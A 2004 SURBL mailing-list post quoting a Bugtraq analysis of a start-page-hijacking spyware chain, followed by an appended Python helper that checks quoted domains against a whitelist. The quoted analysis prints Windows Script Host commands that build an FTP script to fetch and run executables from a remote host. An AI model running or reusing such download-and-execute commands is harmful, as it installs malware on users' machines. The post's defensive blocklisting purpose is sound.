[SURBL-Discuss] Need help checking FP list from Theo
Jeff Chan
jeffc at surbl.org
Tue Sep 7 08:36:28 CEST 2004
My bad, I inadvertently included a message which was about
trojan-like spyware, which is publicly available at:
http://seclists.org/lists/bugtraq/2004/May/0153.html
> http://65.17.207.40/framepb_1u.php
>
> which redirects to
>
> http://si1.default-homepage-network.com/180/180.htm?si-001
>
> which redirects to
>
> http://object.passthison.com/vu083003/object.cgi?si1
>
> which uses the Object Data vulnerability to change your startpage to
>
> http://default-homepage-network.com/start.cgi?hkcu
>
> the parameter at the end is either HKCU or HKLM depending on what
> registry branch lead you there. This serves to notify
> default-homepage-network whether your machine has been compromised with
> user or administrator privileges
>
> start.cgi also opens a few popup windows with advertisements, after
> which it opens the following page
>
> http://default-homepage-network.com/newspynotice.html
>
> that wants to sell you a cure against spyware which hijacks your start
> page - as theirs just did.
>
> That page also secretly opens
>
> http://object.passthison.com/vu083003/newobject1.cgi
> http://69.50.139.61/hp1/hp1.htm
> http://www.achtungachtung.com/0021/index.php
>
> newobject1.cgi executes the following commands through the Windows
> Script Host object:
>
> wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6);
> wsh.Run('command /C echo tmpacct>>o',false,6);
> wsh.Run('command /C echo 12345>>o',false,6);
> wsh.Run('command /C echo bin>>o',false,6);
> wsh.Run('command /C echo get install2.exe>>o',false,6);
> wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
> wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
> wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
> wsh.Run('command /C echo bye>>o',false,6);
> wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o >o.bat',false,6);
> wsh.Run('command /C echo if exist install2.exe install2.exe >>o.bat',false,6);
> wsh.Run('command /C echo if exist infamous_downloader.exe infamous_downloader.exe >>o.bat',false,6);
> wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE >>o.bat',false,6);
> wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe >>o.bat',false,6);
> wsh.Run('command /C o.bat',false,6);
>
> Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
> http://69.50.139.61/hp1/HP1.chm::/hp1.htm
>
> framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which
> uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
>
> Other files that are attempted to be delivered are
>
> http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
> http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
> http://validation-required.info/
> http://www.popmoney.net/ip/index.php
> http://www.portalone.hostance.com.com/italia.exe
Therefore I am taking all those domains out of the possible
whitelist.
Jeff C.
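As an added example (not part of Jeff's post, the quoted Bugtraq advisory, or SURBL's own tooling), the Python below pulls the hostnames out of a quoted message like the one above, turns each into the name a SURBL client would query (reversed octets for an IP literal, the registered domain otherwise), and reports which whitelist candidates they collide with. The message excerpt, the small two-level-TLD table and the candidate list are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: a handful of the URLs quoted in the advisory above.
MESSAGE = """
> http://65.17.207.40/framepb_1u.php
> http://si1.default-homepage-network.com/180/180.htm?si-001
> http://object.passthison.com/vu083003/object.cgi?si1
> http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
> http://www.portalone.hostance.com.com/italia.exe
"""

# Illustrative subset of suffixes under which the registered domain is three
# labels deep; a real deployment would use the full public suffix list.
TWO_LEVEL_TLDS = {"co.uk", "org.uk", "com.au", "co.jp"}

def extract_hosts(text):
    """Return the host of every http(s) URL found in a (quoted) message body."""
    urls = re.findall(r"https?://[^\s>'\"]+", text)
    return [urlsplit(u).hostname for u in urls]

def registered_domain(host):
    """Collapse a hostname to the part SURBL lists: an IP literal is returned
    as-is, otherwise the last 2 labels (3 under a two-level TLD)."""
    host = host.lower().rstrip(".")
    try:
        ipaddress.IPv4Address(host)
        return host
    except ipaddress.AddressValueError:
        pass
    labels = host.split(".")
    depth = 3 if ".".join(labels[-2:]) in TWO_LEVEL_TLDS else 2
    return ".".join(labels[-depth:])

def surbl_name(host, zone="multi.surbl.org"):
    """Build the DNS name a client would look up for this host: SURBL reverses
    the octets of an IP address and appends the zone to a domain unchanged."""
    dom = registered_domain(host)
    try:
        ipaddress.IPv4Address(dom)
        dom = ".".join(reversed(dom.split(".")))
    except ipaddress.AddressValueError:
        pass
    return dom + "." + zone

def whitelist_conflicts(text, candidates):
    """Candidate whitelist entries that also host something in the message;
    these are the ones to drop before the whitelist ships."""
    seen = {registered_domain(h) for h in extract_hosts(text)}
    return sorted(seen & {registered_domain(c) for c in candidates})
```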